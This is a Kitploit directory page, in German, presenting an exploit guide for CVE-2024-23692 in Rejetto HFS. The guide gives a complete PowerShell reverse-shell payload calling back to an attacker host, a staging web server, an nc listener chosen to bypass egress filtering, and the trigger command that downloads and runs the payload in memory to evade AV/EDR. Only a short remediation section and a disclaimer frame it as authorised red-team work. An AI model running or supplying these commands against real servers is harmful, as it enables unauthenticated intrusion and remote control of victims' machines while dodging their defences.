Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-23692 — Automatisiert die Ausnutzung von CVE-2024-23692 gegen ungepatchte Rejetto-HFS-Server mit einer In-Memory-PowerShell-Reverse-Shell, HTTP-Payload-Staging und AV/EDR-Disk-Write-Evasion für autorisierte Red-Team-Einsätze. | Kitploit
Tools/GitHubGitHub/sandimfz/cve-2024-23692
Payload-GenerierungExploitationWebanwendungs-ExploitationCommand and ControlRed Teaming
GitHubsandimfz/cve-2024-23692

CVE-2024-23692

Automatisiert die Ausnutzung von CVE-2024-23692 gegen ungepatchte Rejetto-HFS-Server mit einer In-Memory-PowerShell-Reverse-Shell, HTTP-Payload-Staging und AV/EDR-Disk-Write-Evasion für autorisierte Red-Team-Einsätze.

Repository anzeigen
vor 12 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-23692 - Rejetto HFS Remote Code Execution (RCE)

Eine taktische Dokumentation und ein Exploit-Leitfaden für CVE-2024-23692, eine kritische, ohne Authentifizierung ausnutzbare Schwachstelle für Remote Code Execution (RCE), die Rejetto HTTP File Server (HFS) in Versionen vor 2.3m betrifft. Dieser Leitfaden nutzt eine In-Memory Reverse Shell-Technik (nur RAM), um signaturbasierte Antivirus-/EDR-Erkennungen von Datenträger-Schreibvorgängen erfolgreich zu umgehen.

⚠️ Haftungsausschluss: Dieses Repository und seine Inhalte sind ausschließlich für autorisierte Sicherheitsbewertungen, Penetrationstests, Bug-Bounty-Simulationen und defensive forensische Audits bestimmt. Die unbefugte Nutzung gegen Umgebungen Dritter ist strengstens untersagt.


📌 Quellen & Referenzen

Die in diesem Proof-of-Concept-Workflow implementierte Automatisierungs-Prüfvorlage basiert auf dem öffentlichen Repository von:

  • Exploit-Skriptquelle: VeryLazyTech - CVE-2024-23692

🛠️ Exploit-Workflow (In-Memory Reverse Shell)

Diese Methode nutzt ein HTTP-Stager-Bereitstellungsmodell, um einen textbasierten Payload-String dynamisch in die Zielumgebung zu bringen und die Live-Ausführung direkt aus dem flüchtigen Systemspeicher (RAM) anzustoßen.

Schritt 1: Das Payload-Skript bereitstellen

Erstellen Sie auf Ihrem lokalen C2-/Angreifer-Server eine statische Textdatei namens index.html und befüllen Sie sie mit dem folgenden Kerncode der PowerShell-TCP-Socket-Schleife:

root@kitploit:~
\$c = New-Object System.Net.Sockets.TCPClient('<LHOST>',80);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){;\$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i);\$sb = (iex \$d 2>&1 | Out-String );\$sb2 = \$sb + 'PS ' + (pwd).Path + '> ';\$sbt = ([text.encoding]::ASCII).GetBytes(\$sb2);\$s.Write(\$sbt,0,\$sbt.Length);\$s.Flush()};\$c.Close()

Schritt 2: Den schlanken Webserver starten

Öffnen Sie ein Terminalfenster im vorgesehenen Staging-Ordner, der Ihre Payload-Vorlagendatei enthält, und starten Sie dann einen sofortigen Python-HTTP-Listener auf einem alternativen Port (z. B. 8080):

root@kitploit:~
python3 -m http.server 8080

Schritt 3: Den Netzwerk-Listener einrichten

Öffnen Sie eine zweite, unabhängige Terminalsitzung, um den eingehenden persistenten Shell-Callback zu hosten. Es wird dringend empfohlen, Port 80 (oder 443) zu nutzen, um ausgehende Perimeter-Schutzmaßnahmen (Egress Firewall Filtering) leicht zu umgehen:

root@kitploit:~
sudo nc -lvnp 80

Schritt 4: Den RCE-Exploit auslösen

Starten Sie die automatisierte Validierungs-Engine, die auf Ihre Bereitstellungsinfrastruktur abzielt. Der Zielaufruf greift über einen lokalen CMD-Ausführungswrapper in die Befehlsanalyse ein, um eine optimale String-Stabilität zu gewährleisten, ohne Parameterflags zu verlieren:

root@kitploit:~
./CVE-2024-23692.sh http://<TARGET_IP>:<PORT> "cmd /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>')\""

Screenshot

🛡️ Behebung & Schadensbegrenzung

Um Kompromittierungen vollständig zu beseitigen und verwundbare Betriebsumgebungen zu beheben:

  1. Beenden Sie sofort alle laufenden Rejetto-HFS-Bereitstellungsprozesse im gesamten Systembaum:
    root@kitploit:~
    Get-Process -Name *hfs* | Stop-Process -Force
    
  2. Entfernen Sie restliche Junk-Dateien oder nicht authentifizierte binäre Payloads, die sich in öffentlich beschreibbaren Bereichen befinden:
    root@kitploit:~
    Remove-Item -Path "C:\Users\Public\*.exe" -Force -ErrorAction SilentlyContinue
    
  3. Aktualisieren Sie Bereitstellungsressourcen auf die gepatchte stabile Release-Version oder stellen Sie die Integrationsinfrastruktur auf moderne, sichere alternative Plattformen um.
Tool herunterladen